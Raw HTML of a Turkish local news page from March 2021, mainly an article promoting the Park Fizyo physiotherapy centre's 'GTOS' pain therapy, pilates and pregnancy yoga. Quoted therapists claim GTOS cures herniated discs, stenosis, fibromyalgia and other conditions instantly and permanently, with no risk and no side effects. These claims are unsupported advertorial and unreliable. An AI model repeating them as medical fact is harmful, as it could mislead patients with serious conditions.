href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/fuzulev_gif_980.gif" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kahramanmarasli-sehidin-cenaze-namazini-dayisi-kildirdi-h69446.html" title="Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/03/Ysimsiz-1_8.jpg" alt="Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı" class="pull-left" /> <div class="caption-line"><p>Kahramanmaraşlı şehidin cenaze namazını dayısı...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/sehit-astsubay-nazmi-yilmaz-son-yolculuguna-ugurlandi-h69445.html" title="Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/03/Ysimsiz-1_7.jpg" alt="Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı" class="pull-left" /> <div class="caption-line"><p>Şehit Astsubay Nazmi Yılmaz, son...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/afsin-elbistan-halki-sehidine-veda-edecek-h69436.html" title="Afşin-Elbistan halkı şehidine veda edecek" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/03/Ysimsiz-1_6.jpg" alt="Afşin-Elbistan halkı şehidine veda edecek" class="pull-left" /> <div class="caption-line"><p>Afşin-Elbistan halkı şehidine veda edecek</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-unala-ziyaret-h69433.html" title="Kaymakam Demir’den Ünal’a ziyaret" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/03/Ysimsiz-1_5.jpg" alt="Kaymakam Demir’den Ünal’a ziyaret" class="pull-left" /> <div class="caption-line"><p>Kaymakam Demir’den Ünal’a ziyaret</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/demir-madeni-yeniden-faaliyete-geciyor-h69432.html" title="Demir madeni yeniden faaliyete geçiyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/03/Ysimsiz-1_4.jpg" alt="Demir madeni yeniden faaliyete geçiyor" class="pull-left" /> <div class="caption-line"><p>Demir madeni yeniden faaliyete geçiyor</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/balYk_dunyasY.jpg&w=600&h=200&q=90" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner162" /></a></div> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Park Fizyo’dan ağrılara GTOS terapi çözümü</h1> <h2 class="lead" itemprop="description"><strong> Park Fizyo Ağrısız Yaşam Merkezi fizyoterapistleri Seyda Taşolar ve Sedanur Bölükbaşı, ağrısı olan danışanlar için uyguladıkalrı GTOS (ağrı) terapi yöntemleri ve beraberinde onlar için oluşturdukları egzersiz programları ile ağrısız bir yaşam fırsatı sunduklarını söylediler.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-03-06 18:55:52" content="2021-03-06T18:55:52+02:00">06 Mart 2021 Cumartesi 18:55</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/park_fizyodan_agrilara_gtos_terapi_cozumu_h69447_f96cd.jpg" alt="Park Fizyo’dan ağrılara GTOS terapi çözümü" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/park-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/POLATLAR_600x280_4.gif" width="600" height="280" style="width:600px;height: 280px;border:0" alt="banner167" /></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal"><span style="font-size: 16px;">Ceyhan Mahallesi Dulkadiroğlu Caddesi Çizgi İşhanı’nda hizmet veren Park Fizyo Ağrısız Yaşam Merkezi fizyoterapistleri Seyda Taşolar ve Sedanur Bölükbaşı, GTOS terapisinin yanı sıra , reformer plates, klinik plates, kişiye özel egzersiz,, hamile yogası ve postur analizi hizmeti verdiklerini ifade ettiler.</span><p></p></p> <p class="MsoNormal"><span style="font-size: 16px;">Şiddetli ağrı, güç kaybı ve hareket kısıtlamalarına neden olan ağrı-spazm-ağrı döngüsünün anında ve kalıcı olarak çözülmesi noktasında GTOS terapi yöntemi ile çözdüklerini belirten Fizyoterapistler şunları söyledi:</span><p></p></p> <p class="MsoNormal"><span style="font-size: 16px;">“GTOS Terapi, bel-boyun fıtığı, kanal daralması ,omurga kireçlenmesi , omurga eğriliği(skolyoz) ,siyatalji, fibromiyalji, miyofasyal ağrı( kas romatizması) ,tüm diz ağrısı problemleri, kas yırtıkları, sinir sıkışmaları, karpal tünel, şiddetli ağrı-spazm-ağrı döngüsünü anında ve kalıcı olarak çözen GTOS terapi yüzde 86 oranında uygulama memnuniyeti sağlamaktadır. Ayrıca deride oluşabilecek kızarmalar haricinde hiçbir yan etkisi bulunmayan bu terapi yönteminde ameliyat, ilaç, iğne kullanılmamaktadır.”</span><p></p></p> <p class="MsoNormal"><span style="font-size: 16px;">GTOS Terapi, başta bel ve boyun fıtığı olmak üzere tüm kas iskelet sistemi rahatsızlıklarında başarılıyla uygulanan bir terapi yöntemi olduğunu belirten Fizyoterapist Seyda Taşolar, “GTOS Terapi, başta bel ve boyun fıtığı olmak üzere tüm kas iskelet sistemi rahatsızlıklarında başarılıyla uygulanan bir terapi yöntemdir. Yaklaşık 14-15 yıldır güvenle uygulanmaktadır. GTOS Terapi, alanında uzman fizyoterapistlerce, özgün patentli bir cihazla ve deri altına girmeden uygulanmaktadır. İğne, ilaç, ışın, elektrik vb.ajanlar kullanmadığı için hiçbir riski olmayan bu manuel yöntem ameliyat geçirmiş kronik durumlardan akut ağrılı durumlara ve hamile kadınlara kadar güvenle uygulamaktayız” dedi. </span><p></p></p> <p class="MsoNormal"><span style="font-size: 16px;">GTOS terapi yönteminin başlıca uygulandığı alanlar hakkında bilgi veren Fizyoterapist Sedanur Bölükbaşı ise, “Bel fıtığı, boyun fıtığı, bel ve boyun bölgesi kanal daralması, omurga diskleri arasında kireçleme, siyatik ağrısı gibi bacaklara yayılan ağrılı durumlarda ( radikülopati) boyun bölgesinden kollara yayılan ağrı ve uyuşmalar, boyun düzleşmesi, fibromiyalji, kas ağrısı gibi insanların yaşam kalitesini etkileyen yaygın ağrılarda, Kas yırtığı,  meniskus yırtığı, bağ yaralanmanları ve tendon yaralanmaları gibi ortapedik ve spor yaralanmalarında, kısacası kas iskelet sistemini tutan tüm ağrılı durumlarda etkili bir şekilde kullanılmaktadır. Başarı oranı oldukça yüksek  olup hiçbir yan etkisi yoktur. Bel boyun diz ağrısı gibi mekanik ağrılar spor yapmaya engel değildir. Doğru planlanmış egzersizlerle ağırlardan kurtulup daha sağlıklı ve daha kaliteli bir yaşam mümkündür. Ağrılarımızla yaşamak zorunda değiliz” şeklinde konuştu.</span><p></p></p> <p class="MsoNormal"><span style="font-size: 16px;">Hamilelikte yogası ile anne adaylarının hamilelik döneminin rahat geçmesini sağladıklarını belirten Fizyoterapistler Taşolar ve Bölükbaşı, “Hamile yogası; anne ve bebeği, bedensel zihinsel ruhsal olarak doğuma hazırlayan çalışmaların bütünüdür. Hamilelikte yoga, hamilelik döneminin rahat geçmesi, bulantı, kramp ve gerginlikleri hafifletmek, bel ve omurga kaslarını güçlendirerek bu süreçte oluşacak bel ağrılarını, doğum sonrası oluşabilecek idrar kaçırma gibi birçok problemin önüne geçebilmek için uygulanan oldukça güvenli çalışma bütünüdür” dediler.</span><p></p></p> <p class="MsoNormal"><span style="font-size: 16px;">Plates ve klinik plates ile kas-sinir sitemi rahatsızlıklarına yönelik egzersizler yaptırdıklarını ifaden Fizyoterapistler Seyda Nurbanu Taşolar ve Sedanur Bölükbaşı, “Plates; kasları güçlendirmek, esnekliği artırmak, sıkılaştırmak, bağışıklığı güçlendirmek, duruş bozukluğunun önüne geçmek için yapılan geliştirilmiş egzersiz sistemidir. Klinik plates ise omurga,  eklem, kas-sinir sitemi rahatsızlıklarına yönelik oluşturulan egzersiz programıdır” şeklinde konuştular.<br/> <br/> <br/> <img src="/images/upload/park fizyo (2).jpg" width="640" height="425" alt=""></img><img src="/images/upload/park fizyo (3)(1).jpg" width="640" height="425" alt=""></img><img src="/images/upload/park fizyo (4)(1).jpg" width="640" height="425" alt=""></img><img src="/images/upload/park fizyo (5)(1).jpg" width="640" height="425" alt=""></img></span><p></p></p> <p class="MsoNormal"><p><span style="font-size: 16px;"> </span></p></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/250-bin-tllik-ziynet-esyasi-calan-kadin-tutuklandi-h69448.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kahramanmarasli-sehidin-cenaze-namazini-dayisi-kildirdi-h69446.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sehit-astsubay-nazmi-yilmaz-son-yolculuguna-ugurlandi-h69445.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ozel-yildiz-koleji-bursluluk-sinavi-yapacak-h69444.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/minik-aysenin-hayatini-degistiren-ameliyat-h69443.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/park-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bolgedeki-endustriyel-madenler-icin-ihalar-devrede-h69442.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demirden-dunya-kadinlar-gunu-mesaji-h69441.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-genclerle-celik-comak-oynadi-h69440.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/yasli-adamin-250-bin-tllik-ziynet-esyasini-calan-kadin-yakalandi-h69437.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/afsin-elbistan-halki-sehidine-veda-edecek-h69436.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/vali-coskun-sari-kategoriden-maviye-gecis-yapmak-istiyoruz-h69435.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/meteorolojiden-elbistan-ve-goksun-icin-degerlendirme-h69434.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demirden-unala-ziyaret-h69433.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/demir-madeni-yeniden-faaliyete-geciyor-h69432.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ciftcinin-yardimina-kostu-h69431.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ali-kayasina-cam-teras-yapiliyor-h69430.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/catidan-sarkan-kadini-olumun-kiyisindan-polis-kurtardi-h69429.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sehitlerimiz-icin-ankarada-devlet-toreni-duzenlenecek-h69427.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kahramanmarasa-yurekleri-daglayan-bir-aci-haber-daha-h69426.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/dusen-helikopterde-afsinli-asker-sehit-oldu-h69425.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bitlis-te-askeri-helikopter-dustu-9-sehidimiz-var-h69424.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-500-personelle-dinamik-denetim-yapildi-h69423.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/din-gorevlilerinden-anlamli-bagis-h69422.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/uyusturucu-saticilari-cekici-beklerken-polisi-karsilarinda-buldu-h69421.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/250-bin-tllik-ziynet-esyasi-calan-kadin-tutuklandi-h69448.html" title="250 bin TL’lik ziynet eşyası çalan kadın tutuklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/250_bin_tllik_ziynet_esyasi_calan_kadin_tutuklandi_h69448_a4060.jpeg" alt="250 bin TL’lik ziynet eşyası çalan kadın tutuklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">250 bin TL’lik ziynet eşyası çalan kadın tutuklandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kahramanmarasli-sehidin-cenaze-namazini-dayisi-kildirdi-h69446.html" title="Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/kahramanmarasli_sehidin_cenaze_namazini_dayisi_kildirdi_h69446_4483e.jpg" alt="Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sehit-astsubay-nazmi-yilmaz-son-yolculuguna-ugurlandi-h69445.html" title="Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/sehit_astsubay_nazmi_yilmaz_son_yolculuguna_ugurlandi_h69445_ac540.jpg" alt="Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ozel-yildiz-koleji-bursluluk-sinavi-yapacak-h69444.html" title="Özel Yıldız Koleji bursluluk sınavı yapacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/ozel_yildiz_koleji_bursluluk_sinavi_yapacak_h69444_97e68.jpg" alt="Özel Yıldız Koleji bursluluk sınavı yapacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Özel Yıldız Koleji bursluluk sınavı yapacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/minik-aysenin-hayatini-degistiren-ameliyat-h69443.html" title="Minik Ayşe’nin hayatını değiştiren ameliyat"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/minik_aysenin_hayatini_degistiren_ameliyat_h69443_1e62b.jpg" alt="Minik Ayşe’nin hayatını değiştiren ameliyat" /> <div class="carousel-caption"> <h2> <span style="font-size:">Minik Ayşe’nin hayatını değiştiren ameliyat</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/park-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html" title="Park Fizyo’dan ağrılara GTOS terapi çözümü"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/park_fizyodan_agrilara_gtos_terapi_cozumu_h69447_f96cd.jpg" alt="Park Fizyo’dan ağrılara GTOS terapi çözümü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Park Fizyo’dan ağrılara GTOS terapi çözümü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bolgedeki-endustriyel-madenler-icin-ihalar-devrede-h69442.html" title="Bölgedeki endüstriyel madenler için İHA’lar devrede"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/bolgedeki_endustriyel_madenler_icin_ihalar_devrede_h69442_612d0.jpg" alt="Bölgedeki endüstriyel madenler için İHA’lar devrede" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bölgedeki endüstriyel madenler için İHA’lar devrede</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-dunya-kadinlar-gunu-mesaji-h69441.html" title="Kaymakam Demir’den Dünya Kadınlar Günü mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/kaymakam_demirden_dunya_kadinlar_gunu_mesaji_h69441_d0059.jpg" alt="Kaymakam Demir’den Dünya Kadınlar Günü mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir’den Dünya Kadınlar Günü mesajı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-genclerle-celik-comak-oynadi-h69440.html" title="Kaymakam, gençlerle çelik-çomak oynadı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/kaymakam_genclerle_celik_comak_oynadi_h69440_6ebc4.jpg" alt="Kaymakam, gençlerle çelik-çomak oynadı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam, gençlerle çelik-çomak oynadı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/yasli-adamin-250-bin-tllik-ziynet-esyasini-calan-kadin-yakalandi-h69437.html" title="Yaşlı adamın 250 bin TL’lik ziynet eşyasını çalan kadın yakalandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/yasli_adamin_250_bin_tllik_ziynet_esyasini_calan_kadin_yakalandi_h69437_1107c.jpg" alt="Yaşlı adamın 250 bin TL’lik ziynet eşyasını çalan kadın yakalandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Yaşlı adamın 250 bin TL’lik ziynet eşyasını çalan kadın yakalandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/afsin-elbistan-halki-sehidine-veda-edecek-h69436.html" title="Afşin-Elbistan halkı şehidine veda edecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/afsin_elbistan_halki_sehidine_veda_edecek_h69436_fe8bf.jpg" alt="Afşin-Elbistan halkı şehidine veda edecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">Afşin-Elbistan halkı şehidine veda edecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/vali-coskun-sari-kategoriden-maviye-gecis-yapmak-istiyoruz-h69435.html" title="Vali Coşkun: “Sarı kategoriden maviye geçiş yapmak istiyoruz”"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/vali_coskun_sari_kategoriden_maviye_gecis_yapmak_istiyoruz_h69435_a7c62.jpg" alt="Vali Coşkun: “Sarı kategoriden maviye geçiş yapmak istiyoruz”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Vali Coşkun: “Sarı kategoriden maviye geçiş yapmak istiyoruz”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/meteorolojiden-elbistan-ve-goksun-icin-degerlendirme-h69434.html" title="Meteorolojiden Elbistan ve Göksun için değerlendirme"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/meteorolojiden_elbistan_ve_goksun_icin_degerlendirme_h69434_77c59.jpg" alt="Meteorolojiden Elbistan ve Göksun için değerlendirme" /> <div class="carousel-caption"> <h2> <span style="font-size:">Meteorolojiden Elbistan ve Göksun için değerlendirme</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-unala-ziyaret-h69433.html" title="Kaymakam Demir’den Ünal’a ziyaret"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/kaymakam_demirden_unala_ziyaret_h69433_47102.jpg" alt="Kaymakam Demir’den Ünal’a ziyaret" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir’den Ünal’a ziyaret</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/demir-madeni-yeniden-faaliyete-geciyor-h69432.html" title="Demir madeni yeniden faaliyete geçiyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/demir_madeni_yeniden_faaliyete_geciyor_h69432_e8404.jpg" alt="Demir madeni yeniden faaliyete geçiyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Demir madeni yeniden faaliyete geçiyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ciftcinin-yardimina-kostu-h69431.html" title="Elbistan Belediyesi, çiftçinin yardımına koştu"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/elbistan_belediyesi_ciftcinin_yardimina_kostu_h69431_ab0ee.jpg" alt="Elbistan Belediyesi, çiftçinin yardımına koştu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi, çiftçinin yardımına koştu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ali-kayasina-cam-teras-yapiliyor-h69430.html" title="Ali Kayası’na cam teras yapılıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/ali_kayasina_cam_teras_yapiliyor_h69430_15a97.jpg" alt="Ali Kayası’na cam teras yapılıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ali Kayası’na cam teras yapılıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/catidan-sarkan-kadini-olumun-kiyisindan-polis-kurtardi-h69429.html" title="Çatıdan sarkan kadını, ölümün kıyısından polis kurtardı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/catidan_sarkan_kadini_olumun_kiyisindan_polis_kurtardi_h69429_c650d.jpg" alt="Çatıdan sarkan kadını, ölümün kıyısından polis kurtardı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Çatıdan sarkan kadını, ölümün kıyısından polis kurtardı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sehitlerimiz-icin-ankarada-devlet-toreni-duzenlenecek-h69427.html" title="Şehitlerimiz için Ankara’da devlet töreni düzenlenecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/sehitlerimiz_icin_ankarada_devlet_toreni_duzenlenecek_h69427_f10f7.jpg" alt="Şehitlerimiz için Ankara’da devlet töreni düzenlenecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">Şehitlerimiz için Ankara’da devlet töreni düzenlenecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kahramanmarasa-yurekleri-daglayan-bir-aci-haber-daha-h69426.html" title="Kahramanmaraş’a yürekleri dağlayan bir acı haber daha"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/kahramanmarasa_yurekleri_daglayan_bir_aci_haber_daha_h69426_d36f9.jpg" alt="Kahramanmaraş’a yürekleri dağlayan bir acı haber daha" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kahramanmaraş’a yürekleri dağlayan bir acı haber daha</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/dusen-helikopterde-afsinli-asker-sehit-oldu-h69425.html" title="Düşen helikopterde Afşinli asker şehit oldu"> <span class="label label-important"><i class="halflings-icon white exclamation-sign"></i> Son Dakika</span> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/dusen_helikopterde_afsinli_asker_sehit_oldu_h69425_4ec61.jpg" alt="Düşen helikopterde Afşinli asker şehit oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Düşen helikopterde Afşinli asker şehit oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bitlis-te-askeri-helikopter-dustu-9-sehidimiz-var-h69424.html" title="Bitlis&#039;te askeri helikopter düştü: 9 şehidimiz var"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/bitlis_te_askeri_helikopter_dustu_9_sehidimiz_var_h69424_25ed5.jpeg" alt="Bitlis&#039;te askeri helikopter düştü: 9 şehidimiz var" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bitlis&#039;te askeri helikopter düştü: 9 şehidimiz var</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-500-personelle-dinamik-denetim-yapildi-h69423.html" title="Elbistan’da 500 personelle ‘dinamik denetim’ yapıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/elbistanda_500_personelle_dinamik_denetim_yapildi_h69423_f4e6a.jpg" alt="Elbistan’da 500 personelle ‘dinamik denetim’ yapıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’da 500 personelle ‘dinamik denetim’ yapıldı</span> </h2> </div> </a> 